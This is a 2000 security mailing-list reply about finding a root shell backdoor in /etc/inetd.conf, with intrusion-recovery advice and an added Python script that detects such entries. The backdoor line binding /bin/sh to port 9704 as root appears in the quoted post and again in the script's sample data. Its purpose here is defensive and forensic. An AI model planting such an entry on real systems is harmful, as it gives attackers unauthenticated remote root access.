Security Incidents mailing list archives

Re: Possible widespread hole?


From: Alexander Schreiber <Alexander.Schreiber () INFORMATIK TU-CHEMNITZ DE>
Date: Sun, 27 Aug 2000 14:16:16 +0200

Hi !

On Sat, 26 Aug 2000 c_patin () HOTMAIL COM wrote:

> Hi guys,
>       I was snooping around my box yesterday, and noticed the
> following MAJOR hole listed at the bottom of
> /etc/inetd.conf:
> 9704 stream tcp nowait root /bin/sh sh -i

This is not just a ''security hole'', it's a big fat bright red blinking
neon sign yelling at the top of its lungs ''YOU HAVE BEEN HACKED''.

You have been hacked successfully. I *strongly* suggest you take this
system offline, boot from the install CDs, maybe backup the entire system
for later analysis and *reinstall* the system from *scratch*.

Did you note the latest change time on the /etc/inetd.conf before ''fixing''
this ''security hole''? Depending on the root kit (or the skills of the
attacker, but I guess it was Yet Another Script Kiddie (TM)) this
date was not ''fixed'' so it _might_ _possibly_ give a hint to the time
of the intrusion.

Anyway, you can rely on this not being the only backdoor left on your system.
When you are done wiping the system's disks, reinstalling the system from
the original media (no backups - you might be reloading the hacked system)
and applying the latest security patches I suggest you put that freshly made
backup of a hacked system onto a spare test machine with _no_ net connection,
boot it from known clean media (the rescue set on the install CDs comes to
mind) and start poking around the hacked system. Look out for things like
modified versions of login, ps, telnetd, sshd, finger, who and the like.

> I have since closed the hole, and placed my box behind a
> hardware firewall to protect it. But the interesting thing

Too late.

> is that I was reading Slashdot a little while ago and
> mentioned this in an article about security. And someone
> else had the same exact hole listed inside of his
> /etc/inetd.conf. Is this possibly some major hole in a
> package that we both installed, or did we just get hacked by
> the same person. Seems a little weird to just be
> coincidence. Any advice or ideas?

_If_ this was in a package on your vendor's media I'm pretty sure that said
vendor would have gotten his ass kicked _real_ hard by the security
community. Plus he might even have gotten sued. If it was in a package you got
from somewhere on the net the author of this package would most likely already
have gotten a public beating in bugtraq. So, this is unlikely.

Especially since putting root shells on random (or innocent looking) ports
is one of the telltale signatures of a successful breakin. No, you have
been broken into and you should secure your system (and keep it up to date
with the security patches) to reduce the possibility of this happening
again.

Regards,
       Alex.

--
------------------------------------------------------------------------------
 EMail : als () thangorodrim de              | WWW : http://www.thangorodrim.de/
 "I think there's a world market for about five computers."
         -- attr. Thomas J. Watson (Chairman of the Board, IBM), 1943
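An added example (not from the original post) of the kind of check a defender would run over /etc/inetd.conf to catch entries like the one quoted in the thread: it parses the seven-field inetd.conf format and flags services that spawn a shell, pass an interactive flag, or bind a bare numeric port as root. The inetd.conf content below is constructed sample data; the last line is the exact entry from the thread.

```python
import os
import shlex

# inetd.conf fields: service socket_type protocol wait/nowait user server_program [args]
SHELLS = {"sh", "bash", "csh", "ksh", "tcsh", "zsh", "ash", "dash"}


def parse_inetd_line(line):
    """Return a dict of the inetd.conf fields, or None for comments, blanks or junk."""
    line = line.strip()
    if not line or line.startswith("#"):
        return None
    fields = line.split(None, 6)
    if len(fields) < 6:
        return None  # too short to be a valid entry
    names = ("service", "socket_type", "protocol", "wait", "user", "server")
    entry = dict(zip(names, fields[:6]))
    entry["args"] = shlex.split(fields[6]) if len(fields) == 7 else []
    return entry


def suspicious_reasons(entry):
    """List the reasons an entry looks like a bound shell rather than a real service."""
    reasons = []
    prog = os.path.basename(entry["server"])
    argv0 = os.path.basename(entry["args"][0]) if entry["args"] else ""
    if prog in SHELLS or argv0 in SHELLS:
        reasons.append("server program is a shell")
    if "-i" in entry["args"][1:]:
        reasons.append("interactive shell flag")
    if entry["service"].isdigit():
        reasons.append("numeric port instead of a service name")
    user = entry["user"].replace(":", ".").split(".")[0]  # user may be user.group
    if reasons and user == "root":
        reasons.append("runs as root")
    return reasons


def audit_inetd(text):
    """Return [(line_no, line, reasons)] for every suspicious entry in inetd.conf text."""
    findings = []
    for no, line in enumerate(text.splitlines(), 1):
        entry = parse_inetd_line(line)
        if entry and suspicious_reasons(entry):
            findings.append((no, line.strip(), suspicious_reasons(entry)))
    return findings


SAMPLE_INETD_CONF = """\
# constructed sample, not a real system's file
ftp     stream  tcp     nowait  root    /usr/sbin/tcpd  in.ftpd -l -a
telnet  stream  tcp     nowait  root    /usr/sbin/tcpd  in.telnetd
finger  stream  tcp     nowait  nobody  /usr/sbin/tcpd  in.fingerd
9704 stream tcp nowait root /bin/sh sh -i
"""

if __name__ == "__main__":
    for no, line, reasons in audit_inetd(SAMPLE_INETD_CONF):
        print(f"line {no}: {line}\n    {'; '.join(reasons)}")
```

Run against the real file with `audit_inetd(open("/etc/inetd.conf").read())`; as the post notes, a hit means the whole host is suspect, not just that line.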

